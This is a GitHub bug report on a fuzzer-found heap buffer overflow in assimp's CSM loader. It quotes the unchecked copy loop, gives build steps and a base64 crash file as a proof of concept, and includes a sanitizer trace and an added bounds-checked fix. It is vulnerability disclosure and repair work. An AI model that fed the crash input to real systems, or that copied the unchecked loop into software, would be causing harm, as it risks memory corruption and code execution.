
Bug: Heap-based Buffer Overflow in Assimp::CSMImporter::InternReadFile #6010

Status: Open
d3ng03 opened this issue Feb 25, 2025 · 1 comment
Labels: Bug (Global flag to mark a deviation from expected behaviour), Fuzzer (Bugs found by a fuzzer)

Comments


d3ng03 commented Feb 25, 2025

Summary

Heap buffer overflow in Assimp::CSMImporter::InternReadFile. An attacker could potentially exploit the vulnerability to cause remote code execution if they can trick the victim into running assimp on a malformed CSM file.

Affected

assimp>=5.4.3

Details

In code/AssetLib/CSM/CSMLoader.cpp:154, ot is a pointer to a 1024-char array. There is no buffer length check, which causes a heap buffer overflow and is able to write 1 byte.

char* ot = nda->mNodeName.data;          // fixed-size inline buffer of the node name
while (!IsSpaceOrNewLine(*buffer)) {     // copies until whitespace, never checks capacity
    *ot++ = *buffer++;
}

PoC

  1. Build assimp with sanitizer
git clone https://github.com/assimp/assimp.git && cd assimp

cmake CMakeLists.txt -G "Ninja" -DBUILD_SHARED_LIBS=OFF -DASSIMP_BUILD_ZLIB=ON \
                    -DASSIMP_BUILD_TESTS=OFF -DASSIMP_BUILD_ASSIMP_TOOLS=OFF \
                    -DASSIMP_BUILD_SAMPLES=OFF
cmake --build .

clang -fsanitize=address,fuzzer -std=c++11 -Iinclude fuzz/assimp_fuzzer.cc -o assimp_fuzzer ./lib/libassimp.a ./contrib/zlib/libzlibstatic.a

  2. Run the fuzzer to trigger the bug
echo "TFdTJyBBJA0gTG9hZE9iag0NDSQkJCQkJCQkJCQkJCQkJCRGaXJzdEZyYW1lDScxdFBvaW7/DSEx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==" | base64 -d > crash

./assimp_fuzzer ./crash

Sanitizer Report

=================================================================
==924291==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000045b8 at pc 0x556b190dd09e bp 0x7fff6518c5d0 sp 0x7fff6518c5c8
WRITE of size 1 at 0x6190000045b8 thread T0
    #0 0x556b190dd09d in Assimp::CSMImporter::InternReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, aiScene*, Assimp::IOSystem*) /workspace/assimp_fuzzer/assimp_asan/code/AssetLib/CSM/CSMLoader.cpp:154:31
    #1 0x556b18d04a12 in Assimp::BaseImporter::ReadFile(Assimp::Importer*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Assimp::IOSystem*) /workspace/assimp_fuzzer/assimp_asan/code/Common/BaseImporter.cpp:131:9
    #2 0x556b1877f7e4 in Assimp::Importer::ReadFile(char const*, unsigned int) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:709:30
    #3 0x556b1877d0a2 in Assimp::Importer::ReadFileFromMemory(void const*, unsigned long, unsigned int, char const*) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:507:9
    #4 0x556b18778717 in LLVMFuzzerTestOneInput (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x491717) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #5 0x556b186a1203 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3ba203) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #6 0x556b1868af7f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a3f7f) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #7 0x556b18690cd6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a9cd6) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #8 0x556b186baaf2 in main (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3d3af2) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #9 0x7fb4814a9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7fb4814a9e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #11 0x556b18685844 in _start (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x39e844) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)

0x6190000045b8 is located 0 bytes to the right of 1080-byte region [0x619000004180,0x6190000045b8)
allocated by thread T0 here:
    #0 0x556b1873d87e in malloc (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x45687e) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #1 0x7fb48185e98b in operator new(unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xae98b) (BuildId: e37fe1a879783838de78cbc8c80621fa685d58a2)
    #2 0x556b18d04a12 in Assimp::BaseImporter::ReadFile(Assimp::Importer*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Assimp::IOSystem*) /workspace/assimp_fuzzer/assimp_asan/code/Common/BaseImporter.cpp:131:9
    #3 0x556b1877f7e4 in Assimp::Importer::ReadFile(char const*, unsigned int) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:709:30
    #4 0x556b1877d0a2 in Assimp::Importer::ReadFileFromMemory(void const*, unsigned long, unsigned int, char const*) /workspace/assimp_fuzzer/assimp_asan/code/Common/Importer.cpp:507:9
    #5 0x556b18778717 in LLVMFuzzerTestOneInput (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x491717) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #6 0x556b186a1203 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3ba203) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #7 0x556b1868af7f in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a3f7f) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #8 0x556b18690cd6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3a9cd6) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #9 0x556b186baaf2 in main (/workspace/assimp_fuzzer/assimp_asan/assimp_fuzzer+0x3d3af2) (BuildId: 14559a9c5adc933a1ee50e87be18a77fe0b33b01)
    #10 0x7fb4814a9d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /workspace/assimp_fuzzer/assimp_asan/code/AssetLib/CSM/CSMLoader.cpp:154:31 in Assimp::CSMImporter::InternReadFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, aiScene*, Assimp::IOSystem*)
Shadow bytes around the buggy address:
  0x0c327fff8860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff88a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff88b0: 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa
  0x0c327fff88c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff88d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==924291==ABORTING

Common weakness enumerator (CWE)

  • CWE-122: Heap-based Buffer Overflow
@d3ng03 d3ng03 added the Bug Global flag to mark a deviation from expected behaviour label Feb 25, 2025
@d3ng03 d3ng03 changed the title Bug: heap buffer overflow in Assimp::CSMImporter::InternReadFile Bug: Heap-based Buffer Overflow in Assimp::CSMImporter::InternReadFile Feb 26, 2025
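A bounds-checked version of the token-copy loop quoted in the report, added here as an illustration and not taken from assimp's code base: the `NodeName` struct is a simplified stand-in for `aiString` (same 1024-byte inline buffer), `IsSpaceOrNewLine` is a stand-in for assimp's helper, and `ReadNodeName` is a hypothetical replacement that stops at the buffer's capacity and reports truncation to the caller.

```cpp
// Added example (not assimp's code): a bounds-checked replacement for the
// unchecked copy loop reported in CSMLoader.cpp. NodeName mirrors aiString's
// fixed 1024-byte inline buffer; the helpers are simplified stand-ins.
#include <cstddef>
#include <cstring>
#include <string>

namespace demo {

// Simplified stand-in for Assimp's aiString: fixed inline buffer, no heap.
struct NodeName {
    static const size_t MAXLEN = 1024;
    size_t length = 0;
    char data[MAXLEN] = {0};
};

// Simplified stand-in for Assimp's IsSpaceOrNewLine(): space, tab, line
// ends and the terminating NUL all end a token.
inline bool IsSpaceOrNewLine(char c) {
    return c == ' ' || c == '\t' || c == '\r' || c == '\n' ||
           c == '\f' || c == '\0';
}

// Copies one whitespace-delimited token from `buffer` into `name` without
// ever writing past name.data. Returns the number of input bytes consumed;
// `truncated` is set when the token did not fit, so the caller can reject
// the file or warn instead of silently corrupting the heap.
size_t ReadNodeName(const char* buffer, NodeName& name, bool& truncated) {
    const char* p = buffer;
    char* ot = name.data;
    const char* const end = name.data + NodeName::MAXLEN - 1; // room for NUL
    truncated = false;
    while (!IsSpaceOrNewLine(*p)) {
        if (ot == end) {                          // the check the loop lacked
            truncated = true;
            while (!IsSpaceOrNewLine(*p)) ++p;    // drain the rest of the token
            break;
        }
        *ot++ = *p++;
    }
    *ot = '\0';
    name.length = static_cast<size_t>(ot - name.data);
    return static_cast<size_t>(p - buffer);
}

} // namespace demo
```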
tellypresence (Contributor) commented:

Please add "Fuzzer" label

@turol turol added the Fuzzer Bugs found by a fuzzer label Mar 1, 2025